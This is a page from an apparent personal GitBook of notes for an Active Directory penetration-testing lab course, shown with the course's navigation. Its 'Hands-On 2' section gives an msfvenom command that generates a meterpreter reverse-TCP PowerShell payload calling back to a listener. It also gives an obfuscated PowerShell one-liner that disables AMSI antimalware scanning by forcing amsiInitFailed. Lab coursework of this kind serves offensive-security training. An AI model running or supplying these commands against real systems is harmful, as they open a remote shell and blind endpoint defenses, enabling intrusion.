Linux AD Lab
Home
  • 💕Altered Security
  • Course Content
  • Port Scanning
    • List of Tools
    • Hands-on 1
  • 4️⃣Meta sploit
    • Page 10
    • Hands-On 2
  • 5️⃣Domain Enumeration
    • AD Module and PowerView
    • Hand-On 3
  • 6️⃣Lateral-Movement - Extracting Credential
    • 🔥Credentials
    • Hans-On 4
  • 7️⃣Lateral-Movement - Credential Spraying
    • Spraying Attack
    • Hands-On 5
  • 8️⃣Lateral-Movement - PS Remoting
    • Live of the Land
    • Hands-On 6
  • Application Whitelisting
    • AWL Bypass
    • Hand-On 7
  • Abusing-SQL Servers
    • Page 4
  • ACL Attacks
    • Page 5
  • Domain Privilege Escalation
    • Page 6
  • Domain Dominance
    • Page 7
  • Detection And Defense
    • Page 8
  • Data
    • COLA-FILESRV
    • COLA-SRV2
    • COLA-SAFE
Powered by GitBook
On this page

Was this helpful?

  1. Meta sploit

Hands-On 2

msfvenom -p windows/x64/meterpreter_reverse_tcp -f psh LHOST=192.168.2.1 -o payload.ps1
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-
F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL 
)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( 
( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 
'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
PreviousPage 10NextAD Module and PowerView

Last updated 1 year ago

Was this helpful?

4️⃣